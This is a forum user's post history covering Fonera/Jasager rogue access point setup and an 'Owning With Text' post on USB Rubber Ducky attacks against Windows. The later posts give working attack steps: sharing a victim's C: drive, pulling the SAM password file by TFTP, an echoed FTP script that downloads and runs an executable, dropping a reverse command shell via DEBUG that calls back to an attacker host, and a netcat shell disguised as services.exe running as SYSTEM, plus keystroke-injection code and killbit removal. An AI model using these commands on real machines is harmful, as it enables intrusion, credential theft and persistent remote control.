-
Posts
107 -
Joined
-
Last visited
-
Days Won
5
Posts posted by illwill
-
-
If i want jasager to mimic the access points nearby , do i need to add them to the whitelist
or should it start to mimic them automatically
-
In Episode 725 theres a segment about rickrolling with the Fon
http://beboblog.johnbebo.com/2010/03/13/fo...nd-jasager.aspx
I decided to dust off my old fon to check it out
originally I had a few Fons given to me and I decided to try to get open wrt and jasager on one
I succeeded in installing everything but never had the chance to actually test out anything
I followed the directions on the blog but for some reason my fon isnt allowing anyone to auto connect
and sometimes the router display the SSID of 'open-wrt' or a non ascii character like '[][][][][][][][][][][][[][][][]'
how do i get the fon to auto-accept anyone who has saved wifi ssids like netgear linksys etc?
I did autostart like the blogs direction so karma should be turning on automatically to accept new clients
to auto start karma edit '/etc/init.d/karma_ui'
wlanconfig ath0 create wlandev wifi0 wlanmode master &ifconfig ath0 up &
iwpriv ath0 karma 1 &
-
I would like to see a writeup for this and a demo video
-
as far as I know that was blocked by Microsoft with a killbit entry in the registry years ago
You would have to delete this key first to make it work
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}
-
Since the arduino gives you more control wouldnt it make sense to have the ducky push out a command
like
CommandAtRunBar("reg ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies /v Writeprotect /t REG_DWORD /d 0 /f"); void CommandAtRunBar(char *SomeCommand) { delay(2000); Keyboard.set_modifier(128); //Windows key Keyboard.set_key1(KEY_R); // use r key Keyboard.send_now(); Keyboard.set_modifier(0); //prep release of control keys Keyboard.set_key1(0); //have to do this to keep it from hitting key multiple times. Keyboard.send_now(); //Send the key changes delay(1000); Keyboard.print(SomeCommand); Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); }
to enable usb autorun, then have it complete a connection to a hub/flash drive to deliver the payload
I know people are trying to mimic starting cmd.exe and bypassing the UAC prompt so it should be no problem to get this to work on vista/7
-
made my first multipass usb tonight
hirens 10.0 boots fine (although a little slower than from cd) on the usb drive im testing out
when it gets to the desktop
im not able to open the usb wintools , which pretty much makes hirens minixp useless
im able to use explorer and browse the hard drive but i need tools to scan and do other stuff
anyone else have an issue like this?
blah after doing some reading i found out i had to extract the iso instead of chain loading it
-
i was showing you an example you can convert to usb instead of floppy
i didnt say it did usb
-
-
finished out that guide and i was able to get jasager up and running :)
-
i was able to do it with this guide
http://wiki.cuwin.net/index.php?title=Flas...#Lets_Get_To_It
-
got into redboot with telnet on port 9000
fired up tftp32
ran cmd
* ip_address -l 192.168.1.254/24 -h [remote server address]
* fis init
* load -r -v -b %{FREEMEMLO} openwrt-atheros-2.6-root.jffs2-64k
* fis create -f 0xA8030000 -l 0x006F0000 rootfs
* load -r -v -b %{FREEMEMLO} openwrt-atheros-2.6-vmlinux.lzma
* fis create -r 0x80041000 -e 0x80041000 vmlinux.bin.l7
* reset
still nada
-
ok i got to the part where i need to flash it.
I am connected using a switch
I can't get an ip from dhcp through direct cable connect
nevermind i was using http://wiki.hak5.org/wiki/Fon_Jasager_Install
i read in another guide to connect a different way, the hak5 guide doesnt mention setting your ip manually
trying to flash now, waiting for the "no packet,no packet,no packet" to stop
i can ping the router but the flash program doesnt seem to find it
-
following http://wiki.hak5.org/wiki/Fon_Jasager_Install
Firmware Version: 0.7.1 r1
Using this command:
mtd -e vmlinux.bin.l7 write openwrt-ar531x-2.4-vmlinux-CAMICIA.lzma vmlinux.bin.l7
worked fine, i rebooted it then logged in,and tried running
mtd -e "RedBoot config" write out.hex "RedBoot config" root@OpenWrt:~# mtd -e "RedBoot config" write out.hex "RedBoot config" Couldn't open image file: out.hex!
root@OpenWrt:~# ls dhcp.leases log resolv.conf spool hostapd.conf network-config run
and when i tried to login with winscp i dont see the directories anymore, but i am able to login, any idea on what went wrong?
-
1 - Right click my computer and go to properties
2 - Click on the advanced tab
3 - Under performance click on settings.
4 - scroll to the very bottom and make sure there is a checkmark on "Use drop shadows for icon labels on the desktop"
5 - Click OK
-
i was looking into ordering one from their site last night butit said shipping would take 3weeks
i was also seeing some old coupons for $15 off which no longer work
whats the chances of them giving out coupons again
-
is the version on their page hackable i konw they do updates on the firmware and i dont want to get stuck with one i cant use
-
hey ive got money in my paypal thats burning a hole in my pocket , either i ask here or go to ebay to get one
anyone willing to sell a fonera?
-
Woudl also require them to reboot into a live disc, and as he mentioned, they have bios passwords set, so he probably won't be able to get it to boot from cd or USB.
oops i forgot to mention this article on my site
http://www.whatsmypass.com/?p=78
ok maybe i should read all in the thread before commenting, he wants to have a priv escalation tool that will ive him instant admin once he opens the tool , most of the recent exploits are usually patched within a week or so of becoming public , and usually everyone has automatic updates running.. im not sure of any unpatched priv tools the most recent was http://milw0rm.com/exploits/5518 but probably will not work now since most are patched or have upgraded to sp3 .. im pretty sure the shatter attack still works though
-
http://www.whatsmypass.com/?p=21
using backtrack3 you can do whatever u want
[Version 1] Owning With Text
in Classic USB Rubber Ducky
Posted · Edited by illwill
Bear with me this is going to be a continuing post once i get all my testing done so i know it works with XP as well as Vista/7..
I started to think of other ideas to get control of the machine, thinking back to the old methods of transferring files through an exploit shell prompt I started to think about injecting text into a file and piping it back to DEBUG, piping FTP scripts commands into a file, TFTP, ADODB stream files.
Mind you now I haven't tried these things since circa 2005 so im not sure what new security measures Win Vista/7 has put into place to block some of these things
Also I still have to translate it to Arduino code because most of these were to be used in an exploit shell prompt
here are some old methods of transferring files that i have used:
1. Open the c: drive up for file sharing/transferring
C:\>NET SHARE shareME=C:
which u can connect to in your browser window \\victimsIP\shareME
or type in YOUR dos prompt
c:>NET USE x: \\VICTIMip\shareME /user:GOD
2. TFTP transfers (u need to have a TFTP server running on your computer)
http://www.solarwinds.net/Tools/Free_tools/TFTP_Server/
TFTP [-i] YOURIP [GET | PUT] source [destination]
C:\WINNT\SYSTEM32>TFTP -i 127.0.0.1 GET SAM c:\rootedSAMS
3. from a command prompt echo ftp commands into a .bat file and execute it
echo open SITENAME.COM>$.tmp
echo user USERNAME>>$.tmp
echo PASSWORD>>$.tmp
echo cd public_html>>$.tmp
echo GET test.exe >>$.tmp
echo quit >>$.tmp
ftp -v -i -n -s:$.tmp
del $.tmp
you can append && at the end of each command to act like a carriage return which allows you to write 1-liner commands
using ADODB streams to download the files:
although Microsoft released a patch to circumvent this , all's they did was change an ActiveX flag, which you can remove suing something like this
now not all computers will have internet connections or have some sort of intrusion detection system in place to prevent you from downloading files from the web
so we can use DEBUG to create files from the text we pipe into it.
one example I've created a 1.27kb reverse commandshell in MASM that i fed into exe2bat to create this you can paste into the shell
that will connect back to the ip/hostname and port you specify when executing the exe
once the file is created all's you need to execute it is:
reverse.exe <IP/HOST> <PORT>
(i.e. reverse.exe haxor.reverse-dns.com 8080)
now you dont need to have a connect-back program , but you can use the same method to copy over priv escalation tools, backdoors etc
now getting an admin prompt is good , but what if I wanted SYSTEM privileges? say I copied over netcat using the method described above?
On XP we could use the AT command
I think for Vista/7 they changed the way to do this so you need to add an admin user
rename your nc.exe to services.exe (services.exe cannot be killed by anyone . )
u got a reverse connecting netcat shell that runs as SYSTEM and cannot be killed
*WARNING*
with both types make sure you clean up behind you
so if anyone wants to help out with these ideas let me know, im still working on mine when I have time to do it so I'll post as it comes along